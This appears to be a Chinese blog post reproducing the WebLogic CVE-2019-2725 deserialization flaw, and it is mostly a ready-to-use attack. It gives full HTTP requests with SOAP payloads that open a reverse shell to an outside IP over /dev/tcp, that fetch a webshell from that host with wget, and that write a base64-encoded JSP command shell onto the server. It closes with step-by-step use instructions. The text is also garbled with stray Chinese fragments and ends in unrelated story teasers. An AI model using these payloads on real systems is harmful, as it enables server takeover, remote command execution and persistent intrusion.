weblogic CNVD-C-2019-48814(CVE-2019-2725)

漏洞介紹

中國民生銀行股份有限公司舉辦攻防演練發(fā)現(xiàn)攻擊方采用48814 0day拿下服務(wù)器统阿。

漏洞影響

Weblogic 10.3.6.0

Weblogic 12.1.3.0

Weblogic 12.2.1.2

Weblogic 12.2.1.3

復(fù)現(xiàn)過程

1.確認(rèn)漏洞存在

http://www.bug1024.cn:17021/_async/AsyncResponseService

2.監(jiān)聽自己服務(wù)器的9999端口

3.反彈shell

POST /_async/AsyncResponseService HTTP/1.1
Host: www.bug1024.cn:17001
Content-Length: 794
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: think_var=zh-cn; PHPSESSID=40d1rb84g60dqi60nabgv05qn5
X-Forwarded-For: 192.168.111.135
Connection: keep-alive
Upgrade-Insecure-Requests: 1
content-type: text/xml



<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   
<soapenv:Header> 
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/47.101.198.184/9999 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

含義:把當(dāng)前運行weblogic的bash反彈到47.101.198.184的9999端口上。



反彈成功


4.上傳webshell

POST /_async/AsyncResponseService HTTP/1.1
Host: www.bug1024.cn:17001
Content-Length: 865
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: think_var=zh-cn; PHPSESSID=40d1rb84g60dqi60nabgv05qn5
X-Forwarded-For: 192.168.111.135
Connection: keep-alive
Upgrade-Insecure-Requests: 1
content-type: text/xml


<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   
<soapenv:Header> 
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>wget http://47.101.198.184:80/webshell.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell3.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

5.訪問webshell

http://www.bug1024.cn:17001/_async/webshell3.jsp

無網(wǎng)寫shell

POST /_async/AsyncResponseService HTTP/1.1
Host: www.bug1024.cn:17001
Content-Length: 1388
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Cookie: think_var=zh-cn; PHPSESSID=qro0j9fr8vo4omtc06nvuuou65; JSESSIONID=r71RcyjP4TtTpnYNkhcpvZJNqLzWr82cpzDtTWDzljwnJJl9gm0p!-1900228417
Connection: close
Upgrade-Insecure-Requests: 1
content-type: text/xml



<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   
<soapenv:Header> 
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>echo PCUKICAgIGlmKCIxMjMiLmVxdWFscyhyZXF1ZXN0LmdldFBhcmFtZXRlcigicHdkIikpKXsKICAgICAgICBqYXZhLmlvLklucHV0U3RyZWFtIGluID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhyZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIikpLmdldElucHV0U3RyZWFtKCk7CiAgICAgICAgaW50IGEgPSAtMTsgICAgICAgICAgCiAgICAgICAgYnl0ZVtdIGIgPSBuZXcgYnl0ZVsxMDI0XTsgICAgICAgICAgCiAgICAgICAgb3V0LnByaW50KCI8cHJlPiIpOyAgICAgICAgICAKICAgICAgICB3aGlsZSgoYT1pbi5yZWFkKGIpKSE9LTEpewogICAgICAgICAgICBvdXQucHJpbnRsbihuZXcgU3RyaW5nKGIpKTsgICAgICAgICAgCiAgICAgICAgfQogICAgICAgIG91dC5wcmludCgiPC9wcmU+Iik7CiAgICB9IAogICAgJT4= |base64 -d > servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell1.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

訪問 /_async/webshell.jsp?pwd=123&cmd=ifconfig

總結(jié)

1.反彈shell到自己服務(wù)器
2.burp構(gòu)造payload炉擅,返回202狀態(tài)如上圖
3.反彈shell成功
4.把webshell.txt上傳到自己服務(wù)器上
5.burp構(gòu)造payload破衔,返回202狀態(tài)如上圖
6.訪問webshell.jsp

參考:http://www.reibang.com/p/c4982a845f55?tdsourcetag=s_pctim_aiomsg

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 人面猴
    序言:七十年代末清女,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子晰筛,更是在濱河造成了極大的恐慌嫡丙,老刑警劉巖,帶你破解...
    沈念sama閱讀 216,919評論 6 502
  • 死咒
    序言:濱河連續(xù)發(fā)生了三起死亡事件读第,死亡現(xiàn)場離奇詭異曙博,居然都是意外死亡,警方通過查閱死者的電腦和手機(jī)怜瞒,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,567評論 3 392
  • 救了他兩次的神仙讓他今天三更去死
    文/潘曉璐 我一進(jìn)店門父泳,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人,你說我怎么就攤上這事尘吗∈潘” “怎么了?”我有些...
    開封第一講書人閱讀 163,316評論 0 353
  • 道士緝兇錄:失蹤的賣姜人
    文/不壞的土叔 我叫張陵睬捶,是天一觀的道長。 經(jīng)常有香客問我近刘,道長擒贸,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 58,294評論 1 292
  • ?港島之戀(遺憾婚禮)
    正文 為了忘掉前任觉渴,我火速辦了婚禮介劫,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘案淋。我一直安慰自己座韵,他們只是感情好,可當(dāng)我...
    茶點故事閱讀 67,318評論 6 390
  • 惡毒庶女頂嫁案:這布局不是一般人想出來的
    文/花漫 我一把揭開白布踢京。 她就那樣靜靜地躺著誉碴,像睡著了一般。 火紅的嫁衣襯著肌膚如雪瓣距。 梳的紋絲不亂的頭發(fā)上黔帕,一...
    開封第一講書人閱讀 51,245評論 1 299
  • 城市分裂傳說
    那天,我揣著相機(jī)與錄音蹈丸,去河邊找鬼成黄。 笑死,一個胖子當(dāng)著我的面吹牛逻杖,可吹牛的內(nèi)容都是我干的奋岁。 我是一名探鬼主播荸百,決...
    沈念sama閱讀 40,120評論 3 418
  • 雙鴛鴦連環(huán)套:你想象不到人心有多黑
    文/蒼蘭香墨 我猛地睜開眼虾攻,長吁一口氣:“原來是場噩夢啊……” “哼霎箍!你這毒婦竟也來了漂坏?” 一聲冷哼從身側(cè)響起顶别,我...
    開封第一講書人閱讀 38,964評論 0 275
  • 萬榮殺人案實錄
    序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎完慧,沒想到半個月后剩失,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 45,376評論 1 313
  • ?護(hù)林員之死
    正文 獨居荒郊野嶺守林人離奇死亡脾歧,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,592評論 2 333
  • ?白月光啟示錄
    正文 我和宋清朗相戀三年鞭执,在試婚紗的時候發(fā)現(xiàn)自己被綠了芒粹。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 39,764評論 1 348
  • 活死人
    序言:一個原本活蹦亂跳的男人離奇死亡囤热,死狀恐怖获三,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情疙教,我是刑警寧澤,帶...
    沈念sama閱讀 35,460評論 5 344
  • ?日本核電站爆炸內(nèi)幕
    正文 年R本政府宣布限佩,位于F島的核電站祟同,受9級特大地震影響理疙,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜窖贤,卻給世界環(huán)境...
    茶點故事閱讀 41,070評論 3 327
  • 男人毒藥:我在死后第九天來索命
    文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望豌熄。 院中可真熱鬧锣险,春花似錦囱持、人聲如沸焕济。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,697評論 0 22
  • 一樁弒父案上鞠,背后竟有這般陰謀
    文/蒼蘭香墨 我抬頭看了看天上的太陽芍阎。三九已至谴咸,卻和暖如春岭佳,著一層夾襖步出監(jiān)牢的瞬間珊随,已是汗流浹背叶洞。 一陣腳步聲響...
    開封第一講書人閱讀 32,846評論 1 269
  • 情欲美人皮
    我被黑心中介騙來泰國打工衩辟, 沒想到剛下飛機(jī)就差點兒被人妖公主榨干…… 1. 我叫王不留惭婿,地道東北人财饥。 一個月前我還...
    沈念sama閱讀 47,819評論 2 370
  • 代替公主和親
    正文 我出身青樓沾瓦,卻偏偏與公主長得像贯莺,于是被迫代替她去往敵國和親缕探。 傳聞我的和親對象是個殘疾皇子还蹲,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 44,665評論 2 354

推薦閱讀更多精彩內(nèi)容